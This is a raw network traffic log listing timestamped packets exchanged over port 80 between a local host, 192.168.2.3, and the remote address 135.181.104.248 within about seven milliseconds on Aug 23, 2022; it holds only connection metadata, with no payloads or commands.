Aug 23, 2022 03:43:00.924463987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924482107 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924504042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924515963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924549103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924551964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924585104 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924614906 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924644947 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924679995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924691916 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924699068 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924730062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924752951 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924755096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924788952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924798012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924822092 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924875021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924880981 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924907923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924961090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924962044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924994946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925003052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925038099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925040007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925071001 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925090075 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925108910 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925126076 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925193071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925196886 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925215960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925268888 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925282001 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925404072 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925461054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925482988 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925519943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925530910 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925609112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925641060 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925674915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925764084 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925796032 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925839901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925857067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.925921917 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.925982952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926002026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926043987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926064968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926075935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926101923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926126957 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926158905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926178932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926197052 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926234961 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926235914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926261902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926287889 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926314116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926335096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926363945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926364899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926383018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926399946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926419020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926422119 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926438093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926461935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926471949 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926486969 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926518917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926525116 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926541090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926558971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926563978 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926593065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926603079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926635981 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926654100 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926673889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926693916 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926716089 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926738024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926757097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926774025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926774979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926804066 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926824093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926835060 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926853895 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926872969 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926913023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926923990 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926940918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.926944971 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926971912 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.926991940 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927006960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927023888 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927052021 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927088976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927129030 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927148104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927166939 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927187920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927198887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927206993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927218914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927258968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927280903 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927285910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927306890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927325010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927354097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927375078 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927376986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927383900 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927397013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927397966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927423000 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927433968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927438021 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927453041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927470922 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927500963 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927509069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927515030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927598000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927640915 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927649975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927670956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927690029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927709103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927715063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927727938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927735090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927776098 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927807093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927824020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927843094 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927851915 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927862883 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927872896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927892923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927896023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927903891 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927918911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927951097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.927975893 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927988052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.927994967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928013086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928030968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928035975 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928050041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928056955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928066969 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928082943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928085089 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928102016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928158998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928173065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928181887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928199053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928217888 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928235054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928252935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928267956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928281069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928316116 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928359985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928380013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928396940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928426981 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928443909 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928479910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928558111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928576946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928595066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928616047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928643942 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928644896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928664923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928719044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928720951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928741932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928759098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928788900 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928822994 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928837061 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928869009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928915977 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.928919077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928953886 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928972006 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.928989887 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929003000 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929018974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929040909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929043055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929059029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929089069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929096937 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929102898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929126024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929143906 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929157972 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929179907 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929188013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929198027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929229975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929285049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929294109 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929315090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929335117 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929369926 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929383993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929436922 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929478884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929486036 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929500103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929518938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929526091 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929547071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929552078 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929558992 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929572105 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929590940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929601908 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929625034 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929635048 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929681063 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929723024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929742098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929786921 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929807901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929810047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929828882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929846048 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929878950 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929879904 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929903984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929922104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929948092 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.929954052 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929974079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.929975033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930000067 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930006027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930012941 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930046082 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930085897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930104017 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930135965 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930154085 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930176020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930193901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930233002 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930238008 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930246115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930283070 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930291891 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930326939 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930336952 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930361986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930480003 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930489063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930500031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930520058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930536985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930556059 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930561066 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930576086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930593967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930593967 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930653095 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930701971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930721045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930737972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930756092 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930768013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930775881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930792093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930809021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930830002 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930843115 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930872917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930902004 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930908918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930912971 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930926085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930931091 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.930958986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.930979967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931034088 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931050062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931051970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931060076 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931072950 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931083918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931103945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931113958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931153059 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931173086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931221008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931236982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931618929 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931638956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931657076 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931674957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931691885 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931694984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931715012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931732893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931746006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931751013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931759119 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931770086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931788921 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931793928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931808949 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931822062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931828976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931848049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931850910 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931865931 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.931883097 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.931907892 CEST	49812	80	192.168.2.3	135.181.104.248
